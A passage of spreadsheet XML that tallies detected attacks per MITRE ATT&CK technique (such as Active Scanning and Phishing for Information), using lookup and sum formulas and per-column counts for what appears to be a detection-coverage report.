        <v>65</v>
      </c>
      <c r="B67" s="4" t="str">
        <f>IFERROR(VLOOKUP(A67,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1585</v>
      </c>
      <c r="C67" s="4" t="str">
        <f>IFERROR(VLOOKUP(B67,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Establish Accounts</v>
      </c>
      <c r="D67" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B67)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E67" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B67,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>129</v>
      </c>
      <c r="F67" s="286" t="str">
        <f t="shared" si="4"/>
        <v>1 (129)</v>
      </c>
      <c r="G67" s="292"/>
      <c r="H67" s="322"/>
      <c r="I67" s="322"/>
      <c r="J67" s="12"/>
      <c r="K67" s="13"/>
      <c r="L67" s="394"/>
      <c r="M67" s="322"/>
      <c r="N67" s="322"/>
      <c r="O67" s="322"/>
      <c r="P67" s="12"/>
      <c r="Q67" s="13"/>
      <c r="R67" s="394"/>
      <c r="S67" s="292"/>
      <c r="T67" s="322"/>
      <c r="U67" s="322"/>
      <c r="V67" s="12"/>
      <c r="W67" s="13"/>
      <c r="X67" s="394"/>
      <c r="Y67" s="392"/>
      <c r="Z67" s="392"/>
      <c r="AA67" s="322"/>
      <c r="AB67" s="392"/>
      <c r="AC67" s="16"/>
      <c r="AD67" s="394"/>
      <c r="AE67" s="392"/>
      <c r="AF67" s="392"/>
      <c r="AG67" s="322"/>
      <c r="AH67" s="392"/>
      <c r="AI67" s="16"/>
      <c r="AJ67" s="394"/>
      <c r="AK67" s="392"/>
      <c r="AL67" s="392"/>
      <c r="AM67" s="322"/>
      <c r="AN67" s="392"/>
      <c r="AO67" s="16"/>
      <c r="AP67" s="394"/>
      <c r="AQ67" s="292"/>
      <c r="AR67" s="322"/>
      <c r="AS67" s="322"/>
      <c r="AT67" s="12"/>
      <c r="AU67" s="13"/>
      <c r="AV67" s="394"/>
      <c r="AW67" s="392"/>
      <c r="AX67" s="392"/>
      <c r="AY67" s="322"/>
      <c r="BA67" s="16"/>
      <c r="BB67" s="394"/>
      <c r="BC67" s="292"/>
      <c r="BD67" s="322"/>
      <c r="BE67" s="322"/>
      <c r="BF67" s="12"/>
      <c r="BG67" s="13"/>
      <c r="BH67" s="394"/>
      <c r="BI67" s="292">
        <v>0</v>
      </c>
      <c r="BJ67" s="322">
        <v>0</v>
      </c>
      <c r="BK67" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL67" s="12">
        <v>0</v>
      </c>
      <c r="BM67" s="13">
        <v>0</v>
      </c>
      <c r="BN67" s="394">
        <v>0</v>
      </c>
      <c r="BO67" s="292">
        <v>0</v>
      </c>
      <c r="BP67" s="322">
        <v>0</v>
      </c>
      <c r="BQ67" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="BR67" s="12">
        <v>0</v>
      </c>
      <c r="BS67" s="12">
        <v>0</v>
      </c>
      <c r="BT67" s="13">
        <v>0</v>
      </c>
      <c r="BU67" s="394">
        <v>0</v>
      </c>
      <c r="BV67" s="292">
        <v>0</v>
      </c>
      <c r="BW67" s="322">
        <v>0</v>
      </c>
      <c r="BX67" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY67" s="12">
        <v>0</v>
      </c>
      <c r="BZ67" s="13">
        <v>0</v>
      </c>
      <c r="CA67" s="394">
        <v>0</v>
      </c>
      <c r="CB67" s="292">
        <v>0</v>
      </c>
      <c r="CC67" s="322">
        <v>0</v>
      </c>
      <c r="CD67" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="CE67" s="12">
        <v>0</v>
      </c>
      <c r="CF67" s="12">
        <v>0</v>
      </c>
      <c r="CG67" s="13">
        <v>0</v>
      </c>
      <c r="CH67" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:98" ht="15" customHeight="1">
      <c r="A68" s="4">
        <f t="shared" si="3"/>
        <v>66</v>
      </c>
      <c r="B68" s="4" t="str">
        <f>IFERROR(VLOOKUP(A68,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1586</v>
      </c>
      <c r="C68" s="4" t="str">
        <f>IFERROR(VLOOKUP(B68,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Compromise Accounts</v>
      </c>
      <c r="D68" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B68)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6951</v>
      </c>
      <c r="F68" s="286" t="str">
        <f t="shared" si="4"/>
        <v>1 (6951)</v>
      </c>
      <c r="G68" s="292"/>
      <c r="H68" s="322"/>
      <c r="I68" s="322"/>
      <c r="J68" s="12"/>
      <c r="K68" s="13"/>
      <c r="L68" s="394"/>
      <c r="M68" s="322"/>
      <c r="N68" s="322"/>
      <c r="O68" s="322"/>
      <c r="P68" s="12"/>
      <c r="Q68" s="13"/>
      <c r="R68" s="394"/>
      <c r="S68" s="292"/>
      <c r="T68" s="322"/>
      <c r="U68" s="322"/>
      <c r="V68" s="12"/>
      <c r="W68" s="13"/>
      <c r="X68" s="394"/>
      <c r="Y68" s="392"/>
      <c r="Z68" s="392"/>
      <c r="AA68" s="322"/>
      <c r="AB68" s="392"/>
      <c r="AC68" s="16"/>
      <c r="AD68" s="394"/>
      <c r="AE68" s="392"/>
      <c r="AF68" s="392"/>
      <c r="AG68" s="322"/>
      <c r="AH68" s="392"/>
      <c r="AI68" s="16"/>
      <c r="AJ68" s="394"/>
      <c r="AK68" s="392"/>
      <c r="AL68" s="392"/>
      <c r="AM68" s="322"/>
      <c r="AN68" s="392"/>
      <c r="AO68" s="16"/>
      <c r="AP68" s="394"/>
      <c r="AQ68" s="292"/>
      <c r="AR68" s="322"/>
      <c r="AS68" s="322"/>
      <c r="AT68" s="12"/>
      <c r="AU68" s="13"/>
      <c r="AV68" s="394"/>
      <c r="AW68" s="392"/>
      <c r="AX68" s="392"/>
      <c r="AY68" s="322"/>
      <c r="BA68" s="16"/>
      <c r="BB68" s="394"/>
      <c r="BC68" s="292"/>
      <c r="BD68" s="322"/>
      <c r="BE68" s="322"/>
      <c r="BF68" s="12"/>
      <c r="BG68" s="13"/>
      <c r="BH68" s="394"/>
      <c r="BI68" s="292">
        <v>0</v>
      </c>
      <c r="BJ68" s="322">
        <v>0</v>
      </c>
      <c r="BK68" s="322" t="str">
        <f t="shared" ref="BK68:BK78" si="6">BJ68 &amp; " (" &amp; BI68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL68" s="12">
        <v>0</v>
      </c>
      <c r="BM68" s="13">
        <v>0</v>
      </c>
      <c r="BN68" s="394">
        <v>0</v>
      </c>
      <c r="BO68" s="292">
        <v>1</v>
      </c>
      <c r="BP68" s="322">
        <v>1</v>
      </c>
      <c r="BQ68" s="322" t="str">
        <f t="shared" ref="BQ68:BQ78" si="7">BP68 &amp; " (" &amp; BO68 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BR68" s="12">
        <v>0</v>
      </c>
      <c r="BS68" s="12">
        <v>1</v>
      </c>
      <c r="BT68" s="13">
        <v>1</v>
      </c>
      <c r="BU68" s="394">
        <v>1</v>
      </c>
      <c r="BV68" s="292">
        <v>0</v>
      </c>
      <c r="BW68" s="322">
        <v>0</v>
      </c>
      <c r="BX68" s="322" t="str">
        <f t="shared" ref="BX68:BX78" si="8">BW68 &amp; " (" &amp; BV68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY68" s="12">
        <v>0</v>
      </c>
      <c r="BZ68" s="13">
        <v>0</v>
      </c>
      <c r="CA68" s="394">
        <v>0</v>
      </c>
      <c r="CB68" s="292">
        <v>0</v>
      </c>
      <c r="CC68" s="322">
        <v>0</v>
      </c>
      <c r="CD68" s="322" t="str">
        <f t="shared" ref="CD68:CD78" si="9">CC68 &amp; " (" &amp; CB68 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="CE68" s="12">
        <v>0</v>
      </c>
      <c r="CF68" s="12">
        <v>0</v>
      </c>
      <c r="CG68" s="13">
        <v>0</v>
      </c>
      <c r="CH68" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:98" ht="15" customHeight="1">
      <c r="A69" s="4">
        <f t="shared" ref="A69:A78" si="10">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4" t="str">
        <f>IFERROR(VLOOKUP(A69,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1589</v>
      </c>
      <c r="C69" s="4" t="str">
        <f>IFERROR(VLOOKUP(B69,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Gather Victim Identity Information</v>
      </c>
      <c r="D69" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B69)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F69" s="286" t="str">
        <f t="shared" ref="F69:F78" si="11">D69&amp;" ("&amp;E69&amp;")"</f>
        <v>1 (7)</v>
      </c>
      <c r="G69" s="292"/>
      <c r="H69" s="322"/>
      <c r="I69" s="322"/>
      <c r="J69" s="12"/>
      <c r="K69" s="13"/>
      <c r="L69" s="394"/>
      <c r="M69" s="322"/>
      <c r="N69" s="322"/>
      <c r="O69" s="322"/>
      <c r="P69" s="12"/>
      <c r="Q69" s="13"/>
      <c r="R69" s="394"/>
      <c r="S69" s="292"/>
      <c r="T69" s="322"/>
      <c r="U69" s="322"/>
      <c r="V69" s="12"/>
      <c r="W69" s="13"/>
      <c r="X69" s="394"/>
      <c r="Y69" s="392"/>
      <c r="Z69" s="392"/>
      <c r="AA69" s="322"/>
      <c r="AB69" s="392"/>
      <c r="AC69" s="16"/>
      <c r="AD69" s="394"/>
      <c r="AE69" s="392"/>
      <c r="AF69" s="392"/>
      <c r="AG69" s="322"/>
      <c r="AH69" s="392"/>
      <c r="AI69" s="16"/>
      <c r="AJ69" s="394"/>
      <c r="AK69" s="392"/>
      <c r="AL69" s="392"/>
      <c r="AM69" s="322"/>
      <c r="AN69" s="392"/>
      <c r="AO69" s="16"/>
      <c r="AP69" s="394"/>
      <c r="AQ69" s="292"/>
      <c r="AR69" s="322"/>
      <c r="AS69" s="322"/>
      <c r="AT69" s="12"/>
      <c r="AU69" s="13"/>
      <c r="AV69" s="394"/>
      <c r="AW69" s="392"/>
      <c r="AX69" s="392"/>
      <c r="AY69" s="322"/>
      <c r="BA69" s="16"/>
      <c r="BB69" s="394"/>
      <c r="BC69" s="292"/>
      <c r="BD69" s="322"/>
      <c r="BE69" s="322"/>
      <c r="BF69" s="12"/>
      <c r="BG69" s="13"/>
      <c r="BH69" s="394"/>
      <c r="BI69" s="292">
        <v>0</v>
      </c>
      <c r="BJ69" s="322">
        <v>0</v>
      </c>
      <c r="BK69" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL69" s="12">
        <v>0</v>
      </c>
      <c r="BM69" s="13">
        <v>0</v>
      </c>
      <c r="BN69" s="394">
        <v>0</v>
      </c>
      <c r="BO69" s="292">
        <v>0</v>
      </c>
      <c r="BP69" s="322">
        <v>0</v>
      </c>
      <c r="BQ69" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="BR69" s="12">
        <v>0</v>
      </c>
      <c r="BS69" s="12">
        <v>0</v>
      </c>
      <c r="BT69" s="13">
        <v>0</v>
      </c>
      <c r="BU69" s="394">
        <v>0</v>
      </c>
      <c r="BV69" s="292">
        <v>0</v>
      </c>
      <c r="BW69" s="322">
        <v>0</v>
      </c>
      <c r="BX69" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY69" s="12">
        <v>0</v>
      </c>
      <c r="BZ69" s="13">
        <v>0</v>
      </c>
      <c r="CA69" s="394">
        <v>0</v>
      </c>
      <c r="CB69" s="292">
        <v>0</v>
      </c>
      <c r="CC69" s="322">
        <v>0</v>
      </c>
      <c r="CD69" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE69" s="12">
        <v>0</v>
      </c>
      <c r="CF69" s="12">
        <v>0</v>
      </c>
      <c r="CG69" s="13">
        <v>0</v>
      </c>
      <c r="CH69" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:98" ht="15" customHeight="1">
      <c r="A70" s="4">
        <f t="shared" si="10"/>
        <v>68</v>
      </c>
      <c r="B70" s="4" t="str">
        <f>IFERROR(VLOOKUP(A70,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1595</v>
      </c>
      <c r="C70" s="4" t="str">
        <f>IFERROR(VLOOKUP(B70,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Active Scanning</v>
      </c>
      <c r="D70" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B70)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2574</v>
      </c>
      <c r="F70" s="286" t="str">
        <f t="shared" si="11"/>
        <v>3 (2574)</v>
      </c>
      <c r="G70" s="292"/>
      <c r="H70" s="322"/>
      <c r="I70" s="322"/>
      <c r="J70" s="12"/>
      <c r="K70" s="13"/>
      <c r="L70" s="394"/>
      <c r="M70" s="322"/>
      <c r="N70" s="322"/>
      <c r="O70" s="322"/>
      <c r="P70" s="12"/>
      <c r="Q70" s="13"/>
      <c r="R70" s="394"/>
      <c r="S70" s="292"/>
      <c r="T70" s="322"/>
      <c r="U70" s="322"/>
      <c r="V70" s="12"/>
      <c r="W70" s="13"/>
      <c r="X70" s="394"/>
      <c r="Y70" s="392"/>
      <c r="Z70" s="392"/>
      <c r="AA70" s="322"/>
      <c r="AB70" s="392"/>
      <c r="AC70" s="16"/>
      <c r="AD70" s="394"/>
      <c r="AE70" s="392"/>
      <c r="AF70" s="392"/>
      <c r="AG70" s="322"/>
      <c r="AH70" s="392"/>
      <c r="AI70" s="16"/>
      <c r="AJ70" s="394"/>
      <c r="AK70" s="392"/>
      <c r="AL70" s="392"/>
      <c r="AM70" s="322"/>
      <c r="AN70" s="392"/>
      <c r="AO70" s="16"/>
      <c r="AP70" s="394"/>
      <c r="AQ70" s="292"/>
      <c r="AR70" s="322"/>
      <c r="AS70" s="322"/>
      <c r="AT70" s="12"/>
      <c r="AU70" s="13"/>
      <c r="AV70" s="394"/>
      <c r="AW70" s="392"/>
      <c r="AX70" s="392"/>
      <c r="AY70" s="322"/>
      <c r="BA70" s="16"/>
      <c r="BB70" s="394"/>
      <c r="BC70" s="292"/>
      <c r="BD70" s="322"/>
      <c r="BE70" s="322"/>
      <c r="BF70" s="12"/>
      <c r="BG70" s="13"/>
      <c r="BH70" s="394"/>
      <c r="BI70" s="292">
        <v>0</v>
      </c>
      <c r="BJ70" s="322">
        <v>0</v>
      </c>
      <c r="BK70" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL70" s="12">
        <v>0</v>
      </c>
      <c r="BM70" s="13">
        <v>0</v>
      </c>
      <c r="BN70" s="394">
        <v>0</v>
      </c>
      <c r="BO70" s="292">
        <v>16</v>
      </c>
      <c r="BP70" s="322">
        <v>12</v>
      </c>
      <c r="BQ70" s="322" t="str">
        <f t="shared" si="7"/>
        <v>12 (16)</v>
      </c>
      <c r="BR70" s="12">
        <v>0</v>
      </c>
      <c r="BS70" s="12">
        <v>9</v>
      </c>
      <c r="BT70" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="BU70" s="394">
        <v>10</v>
      </c>
      <c r="BV70" s="292">
        <v>0</v>
      </c>
      <c r="BW70" s="322">
        <v>0</v>
      </c>
      <c r="BX70" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY70" s="12">
        <v>0</v>
      </c>
      <c r="BZ70" s="13">
        <v>0</v>
      </c>
      <c r="CA70" s="394">
        <v>0</v>
      </c>
      <c r="CB70" s="292">
        <v>0</v>
      </c>
      <c r="CC70" s="322">
        <v>0</v>
      </c>
      <c r="CD70" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE70" s="12">
        <v>0</v>
      </c>
      <c r="CF70" s="12">
        <v>0</v>
      </c>
      <c r="CG70" s="13">
        <v>0</v>
      </c>
      <c r="CH70" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:98" ht="15" customHeight="1">
      <c r="A71" s="4">
        <f t="shared" si="10"/>
        <v>69</v>
      </c>
      <c r="B71" s="4" t="str">
        <f>IFERROR(VLOOKUP(A71,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1598</v>
      </c>
      <c r="C71" s="4" t="str">
        <f>IFERROR(VLOOKUP(B71,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Phishing for Information</v>
      </c>
      <c r="D71" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B71)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E71" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B71,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>59</v>
      </c>
      <c r="F71" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (59)</v>
      </c>
      <c r="G71" s="292"/>
      <c r="H71" s="322"/>
      <c r="I71" s="322"/>
      <c r="J71" s="12"/>
      <c r="K71" s="13"/>
      <c r="L71" s="394"/>
      <c r="M71" s="322"/>
      <c r="N71" s="322"/>
      <c r="O71" s="322"/>
      <c r="P71" s="12"/>
      <c r="Q71" s="13"/>
      <c r="R71" s="394"/>
      <c r="S71" s="292"/>
      <c r="T71" s="322"/>
      <c r="U71" s="322"/>
      <c r="V71" s="12"/>
      <c r="W71" s="13"/>
      <c r="X71" s="394"/>
      <c r="Y71" s="392"/>
      <c r="Z71" s="392"/>
      <c r="AA71" s="322"/>
      <c r="AB71" s="392"/>
      <c r="AC71" s="16"/>
      <c r="AD71" s="394"/>
      <c r="AE71" s="392"/>
      <c r="AF71" s="392"/>
      <c r="AG71" s="322"/>
      <c r="AH71" s="392"/>
      <c r="AI71" s="16"/>
      <c r="AJ71" s="394"/>
      <c r="AK71" s="392"/>
      <c r="AL71" s="392"/>
      <c r="AM71" s="322"/>
      <c r="AN71" s="392"/>
      <c r="AO71" s="16"/>
      <c r="AP71" s="394"/>
      <c r="AQ71" s="292"/>
      <c r="AR71" s="322"/>
      <c r="AS71" s="322"/>
      <c r="AT71" s="12"/>
      <c r="AU71" s="13"/>
      <c r="AV71" s="394"/>
      <c r="AW71" s="392"/>
      <c r="AX71" s="392"/>
      <c r="AY71" s="322"/>
      <c r="BA71" s="16"/>
      <c r="BB71" s="394"/>
      <c r="BC71" s="292"/>
      <c r="BD71" s="322"/>
      <c r="BE71" s="322"/>
      <c r="BF71" s="12"/>
      <c r="BG71" s="13"/>
      <c r="BH71" s="394"/>
      <c r="BI71" s="292">
        <v>0</v>
      </c>
      <c r="BJ71" s="322">
        <v>0</v>
      </c>
      <c r="BK71" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL71" s="12">
        <v>0</v>
      </c>
      <c r="BM71" s="13">
        <v>0</v>
      </c>
      <c r="BN71" s="394">
        <v>0</v>
      </c>
      <c r="BO71" s="292">
        <v>58</v>
      </c>
      <c r="BP71" s="322">
        <v>58</v>
      </c>
      <c r="BQ71" s="322" t="str">
        <f t="shared" si="7"/>
        <v>58 (58)</v>
      </c>
      <c r="BR71" s="12">
        <v>0</v>
      </c>
      <c r="BS71" s="12">
        <v>4</v>
      </c>
      <c r="BT71" s="13">
        <v>1</v>
      </c>
      <c r="BU71" s="394">
        <v>58</v>
      </c>
      <c r="BV71" s="292">
        <v>0</v>
      </c>
      <c r="BW71" s="322">
        <v>0</v>
      </c>
      <c r="BX71" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY71" s="12">
        <v>0</v>
      </c>
      <c r="BZ71" s="13">
        <v>0</v>
      </c>
      <c r="CA71" s="394">
        <v>0</v>
      </c>
      <c r="CB71" s="292">
        <v>0</v>
      </c>
      <c r="CC71" s="322">
        <v>0</v>
      </c>
      <c r="CD71" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE71" s="12">
        <v>0</v>
      </c>
      <c r="CF71" s="12">
        <v>0</v>
      </c>
      <c r="CG71" s="13">
        <v>0</v>
      </c>
      <c r="CH71" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:98" ht="15" customHeight="1">
      <c r="A72" s="4">
        <f t="shared" si="10"/>
        <v>70</v>
      </c>
      <c r="B72" s="4" t="str">
        <f>IFERROR(VLOOKUP(A72,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1599</v>
      </c>
      <c r="C72" s="4" t="str">
        <f>IFERROR(VLOOKUP(B72,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Boundary Bridging</v>
      </c>
      <c r="D72" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B72)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E72" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B72,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>8</v>
      </c>
      <c r="F72" s="286" t="str">
        <f t="shared" si="11"/>
        <v>2 (8)</v>
      </c>
      <c r="G72" s="292"/>
      <c r="H72" s="322"/>
      <c r="I72" s="322"/>
      <c r="J72" s="12"/>
      <c r="K72" s="13"/>
      <c r="L72" s="394"/>
      <c r="M72" s="322"/>
      <c r="N72" s="322"/>
      <c r="O72" s="322"/>
      <c r="P72" s="12"/>
      <c r="Q72" s="13"/>
      <c r="R72" s="394"/>
      <c r="S72" s="292"/>
      <c r="T72" s="322"/>
      <c r="U72" s="322"/>
      <c r="V72" s="12"/>
      <c r="W72" s="13"/>
      <c r="X72" s="394"/>
      <c r="Y72" s="392"/>
      <c r="Z72" s="392"/>
      <c r="AA72" s="322"/>
      <c r="AB72" s="392"/>
      <c r="AC72" s="16"/>
      <c r="AD72" s="394"/>
      <c r="AE72" s="392"/>
      <c r="AF72" s="392"/>
      <c r="AG72" s="322"/>
      <c r="AH72" s="392"/>
      <c r="AI72" s="16"/>
      <c r="AJ72" s="394"/>
      <c r="AK72" s="392"/>
      <c r="AL72" s="392"/>
      <c r="AM72" s="322"/>
      <c r="AN72" s="392"/>
      <c r="AO72" s="16"/>
      <c r="AP72" s="394"/>
      <c r="AQ72" s="292"/>
      <c r="AR72" s="322"/>
      <c r="AS72" s="322"/>
      <c r="AT72" s="12"/>
      <c r="AU72" s="13"/>
      <c r="AV72" s="394"/>
      <c r="AW72" s="392"/>
      <c r="AX72" s="392"/>
      <c r="AY72" s="322"/>
      <c r="BA72" s="16"/>
      <c r="BB72" s="394"/>
      <c r="BC72" s="292"/>
      <c r="BD72" s="322"/>
      <c r="BE72" s="322"/>
      <c r="BF72" s="12"/>
      <c r="BG72" s="13"/>
      <c r="BH72" s="394"/>
      <c r="BI72" s="292">
        <v>0</v>
      </c>
      <c r="BJ72" s="322">
        <v>0</v>
      </c>
      <c r="BK72" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL72" s="12">
        <v>0</v>
      </c>
      <c r="BM72" s="13">
        <v>0</v>
      </c>
      <c r="BN72" s="394">
        <v>0</v>
      </c>
      <c r="BO72" s="292">
        <v>6</v>
      </c>
      <c r="BP72" s="322">
        <v>6</v>
      </c>
      <c r="BQ72" s="322" t="str">
        <f t="shared" si="7"/>
        <v>6 (6)</v>
      </c>
      <c r="BR72" s="12">
        <v>0</v>
      </c>
      <c r="BS72" s="12">
        <v>2</v>
      </c>
      <c r="BT72" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BU72" s="394">
        <v>6</v>
      </c>
      <c r="BV72" s="292">
        <v>0</v>
      </c>
      <c r="BW72" s="322">
        <v>0</v>
      </c>
      <c r="BX72" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BY72" s="12">
        <v>0</v>
      </c>
      <c r="BZ72" s="13">
        <v>0</v>
      </c>
      <c r="CA72" s="394">
        <v>0</v>
      </c>
      <c r="CB72" s="292">
        <v>0</v>
      </c>
      <c r="CC72" s="322">
        <v>0</v>
      </c>
      <c r="CD72" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="CE72" s="12">
        <v>0</v>
      </c>
      <c r="CF72" s="12">
        <v>0</v>
      </c>
      <c r="CG72" s="13">
        <v>0</v>
      </c>
      <c r="CH72" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:98" ht="15" customHeight="1">
      <c r="A73" s="4">
        <f t="shared" si="10"/>
        <v>71</v>
      </c>
      <c r="B73" s="4" t="str">
        <f>IFERROR(VLOOKUP(A73,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1602</v>
      </c>
      <c r="C73" s="4" t="str">
        <f>IFERROR(VLOOKUP(B73,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Configuration Repository</v>
      </c>
      <c r="D73" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B73)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E73" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B73,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F73" s="286" t="str">
        <f t="shared" si="11"/>
        <v>1 (2)</v>
      </c>
      <c r="G73" s="292"/>
      <c r="H73" s="322"/>
      <c r="I73" s="322"/>
      <c r="J73" s="12"/>
      <c r="K73" s="13"/>
      <c r="L73" s="394"/>
      <c r="M73" s="322"/>
      <c r="N73" s="322"/>
      <c r="O73" s="322"/>
      <c r="P73" s="12"/>
      <c r="Q73" s="13"/>
      <c r="R73" s="394"/>
      <c r="S73" s="292"/>
      <c r="T73" s="322"/>
      <c r="U73" s="322"/>
      <c r="V73" s="12"/>
      <c r="W73" s="13"/>
      <c r="X73" s="394"/>
      <c r="Y73" s="392"/>
      <c r="Z73" s="392"/>
      <c r="AA73" s="322"/>
      <c r="AB73" s="392"/>
      <c r="AC73" s="16"/>
      <c r="AD73" s="394"/>
      <c r="AE73" s="392"/>
      <c r="AF73" s="392"/>
      <c r="AG73" s="322"/>
      <c r="AH73" s="392"/>
      <c r="AI73" s="16"/>
      <c r="AJ73" s="394"/>
      <c r="AK73" s="392"/>
      <c r="AL73" s="392"/>
      <c r="AM73" s="322"/>
      <c r="AN73" s="392"/>
      <c r="AO73" s="16"/>
      <c r="AP73" s="394"/>
      <c r="AQ73" s="292"/>
      <c r="AR73" s="322"/>
      <c r="AS73" s="322"/>
      <c r="AT73" s="12"/>
      <c r="AU73" s="13"/>
      <c r="AV73" s="394"/>
      <c r="AW73" s="392"/>
      <c r="AX73" s="392"/>
      <c r="AY73" s="322"/>
      <c r="BA73" s="16"/>
      <c r="BB73" s="394"/>
      <c r="BC73" s="292"/>
      <c r="BD73" s="322"/>
      <c r="BE73" s="322"/>
      <c r="BF73" s="12"/>
      <c r="BG73" s="13"/>
      <c r="BH73" s="394"/>
      <c r="BI73" s="292">
        <v>0</v>
      </c>
      <c r="BJ73" s="322">
        <v>0</v>
      </c>
      <c r="BK73" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="BL73" s="12">
        <v>0</v>
      </c>
      <c r="BM73" s="13">
        <v>0</v>
      </c>
      <c r="BN73" s="394">
        <v>0</v>
      </c>
      <c r="BO73" s="292">
        <v>2</v>
      </c>
